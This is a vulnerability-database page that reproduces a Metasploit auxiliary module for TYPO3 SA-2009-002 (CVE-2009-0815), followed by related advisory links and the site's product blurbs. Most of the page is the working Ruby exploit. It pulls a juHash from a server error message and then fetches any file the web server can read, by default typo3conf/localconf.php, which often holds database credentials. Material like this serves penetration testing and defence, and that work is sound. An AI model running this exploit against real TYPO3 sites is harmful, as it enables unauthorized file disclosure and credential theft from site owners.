Lucene search
K

Typo3 sa-2009-002 File Disclosure

🗓️ 15 Mar 2009 02:32:34Reported by spinbad <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 67 Views

This module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-0815
10 Feb 200900:00
circl
CVE
CVE-2009-0815
5 Mar 200902:00
cve
Cvelist
CVE-2009-0815
5 Mar 200902:00
cvelist
Tenable Nessus
Debian DSA-1720-1 : typo3-src - several vulnerabilities
12 Feb 200900:00
nessus
Tenable Nessus
FreeBSD : typo3 -- XSS and information disclosure (cc47fafe-f823-11dd-94d9-0030843d3802)
12 Feb 200900:00
nessus
Tenable Nessus
TYPO3 'jumpUrl' Mechanism Information Disclosure
12 Feb 200900:00
nessus
Dsquare
Typo3 FD
26 Jan 201200:00
dsquare
Github Security Blog
TYPO3 leaks a hash secret in an error message
2 May 202203:18
github
NVD
CVE-2009-0815
5 Mar 200902:30
nvd
OpenVAS
FreeBSD Ports: typo3
13 Feb 200900:00
openvas
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Typo3 sa-2009-002 File Disclosure',
        'Description' => %q{
          This module exploits a file disclosure vulnerability in the jumpUrl mechanism of
          Typo3. This flaw can be used to read any file that the web server user account has
          access to.
        },
        'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '52048'],
          ['CVE', '2009-0815'],
          ['URL', 'http://web.archive.org/web/20090212165636/http://secunia.com:80/advisories/33829/'],
          ['EDB', '8038'],
          ['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/'],
        ],
        'DisclosureDate' => '2009-02-10',
        'Actions' => [
          ['Download', { 'Description' => 'Download arbitrary file' }]
        ],
        'DefaultAction' => 'Download'
      )
    )

    register_options(
      [
        OptString.new('URI', [true, 'Typo3 Path', '/']),
        OptString.new('RFILE', [true, 'The remote file to download', 'typo3conf/localconf.php']),
        OptString.new('LFILE', [true, 'The local filename to store the data', 'localconf.php']),
      ]
    )
  end

  def run
    print_status('Establishing a connection to the target...')

    error_uri = datastore['URI'] + '/index.php?jumpurl=' + datastore['RFILE'] + '&juSecure=1&type=0&locationData=1:'
    ju_hash = nil

    res = send_request_raw({
      'uri' => error_uri,
      'method' => 'GET',
      'headers' =>
      {
        'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        'Connection' => 'Close'
      }
    }, 25)

    if (res && (res.message == 'OK'))
      res.body =~ /jumpurl Secure: Calculated juHash, ((\w)+), did not match the submitted juHash./

      if ::Regexp.last_match(1).nil?
        print_error('Error while getting juHash. Maybe the version is already patched...')
        return
      end

      ju_hash = ::Regexp.last_match(1)
      print_status("Getting juHash from error message: #{ju_hash}")

    else
      print_error('No response from the server.')
      return
    end

    file_uri = datastore['URI'] + '/index.php?jumpurl=' + datastore['RFILE'] + "&juSecure=1&type=0&juHash=#{ju_hash}&locationData=1:"
    print_status("Trying to get #{datastore['RFILE']}.")

    file = send_request_raw({
      'uri' => file_uri,
      'method' => 'GET',
      'headers' =>
      {
        'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        'Connection' => 'Close'
      }
    }, 25)

    if (file && ((file.message = 'OK')))
      if file.body == 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
        print_error("File #{datastore['RFILE']} does not exist.")
        return
      end

      print_status("Writing local file #{datastore['LFILE']}.")
      open(datastore['LFILE'], 'w') { |f| f << file.body }
    else
      print_error('Error while getting file.')
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Mar 2023 10:43Current
6.4Medium risk
Vulners AI Score6.4
CVSS 25
EPSS0.42227
67